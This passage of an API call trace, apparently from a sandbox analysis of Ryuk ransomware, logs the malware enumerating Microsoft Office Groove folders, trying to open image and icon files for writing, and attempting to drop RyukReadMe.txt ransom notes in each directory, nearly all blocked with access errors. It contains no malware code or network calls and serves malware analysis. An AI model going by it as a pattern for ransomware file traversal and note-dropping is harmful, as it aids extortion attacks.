returned 0 [0137.324] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.324] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.324] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.324] SetLastError (dwErrCode=0x0) [0137.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.324] GetLastError () returned 0x5 [0137.324] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.324] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.324] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0137.324] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0137.324] SetLastError (dwErrCode=0x0) [0137.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.324] GetLastError () returned 0x5 [0137.324] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0137.324] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.324] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.324] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImages.jpg", dwFileAttributes=0x80) returned 0 [0137.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttoolseticonimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.325] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.325] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.325] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.325] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0137.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttoolseticonimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.325] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.325] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.326] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.326] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg", dwFileAttributes=0x80) returned 0 [0137.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\splashimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.326] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.326] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.326] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.326] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImageMask.bmp", dwFileAttributes=0x80) returned 0 [0137.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\splashimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.327] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.327] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.327] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.327] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABMASK.BMP", dwFileAttributes=0x80) returned 0 [0137.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABMASK.BMP" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\tabmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.327] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.327] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.327] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.328] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG", dwFileAttributes=0x80) returned 0 [0137.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\taboff.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.328] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.328] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.328] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.328] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG", dwFileAttributes=0x80) returned 0 [0137.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\tabon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.328] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.328] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.329] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.329] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG", dwFileAttributes=0x80) returned 0 [0137.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\whitebox.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.329] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.329] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.329] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.329] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WhiteboxMask.bmp", dwFileAttributes=0x80) returned 0 [0137.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WhiteboxMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\whiteboxmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.330] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.330] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.330] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.330] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.330] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg", dwFileAttributes=0x80) returned 0 [0137.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\zoomicons.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.330] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.330] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.330] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.330] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.330] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIconsMask.bmp", dwFileAttributes=0x80) returned 0 [0137.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\zoomiconsmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.331] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.331] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.331] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0137.331] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.331] SetLastError (dwErrCode=0x0) [0137.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.332] GetLastError () returned 0x5 [0137.332] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0137.332] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.332] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0137.332] SetLastError (dwErrCode=0x0) [0137.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.332] GetLastError () returned 0x5 [0137.332] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0137.332] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.332] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2d00 [0137.333] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.333] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.333] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.333] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg", dwFileAttributes=0x80) returned 0 [0137.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\welcome tool\\iconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.333] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.333] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.333] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.333] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.333] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0137.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\welcome tool\\iconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.334] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.334] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.334] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0137.334] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.334] SetLastError (dwErrCode=0x0) [0137.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\welcome tool\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.334] GetLastError () returned 0x5 [0137.334] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0137.334] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.334] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0137.334] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0137.334] SetLastError (dwErrCode=0x0) [0137.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.334] GetLastError () returned 0x5 [0137.334] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0137.334] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.334] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0137.334] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0137.335] SetLastError (dwErrCode=0x0) [0137.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.335] GetLastError () returned 0x5 [0137.335] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.335] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.335] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.335] SetLastError (dwErrCode=0x0) [0137.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.335] GetLastError () returned 0x5 [0137.335] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.335] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.335] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2d00 [0137.337] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.337] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.337] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.337] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ALERT.ICO", dwFileAttributes=0x80) returned 0 [0137.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ALERT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\alert.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.338] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.338] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.338] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.338] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.338] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO", dwFileAttributes=0x80) returned 0 [0137.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\chevron.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.338] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.338] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.338] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.338] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.339] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO", dwFileAttributes=0x80) returned 0 [0137.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\computer.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.339] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.339] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.339] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.339] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.339] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico", dwFileAttributes=0x80) returned 0 [0137.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\contactselector.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.339] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.339] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.340] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.340] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.340] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrorfromgroove.ico", dwFileAttributes=0x80) returned 0 [0137.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrorfromgroove.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrorfromgroove.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.350] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.350] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.351] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.351] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.351] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico", dwFileAttributes=0x80) returned 0 [0137.351] CreateFileW 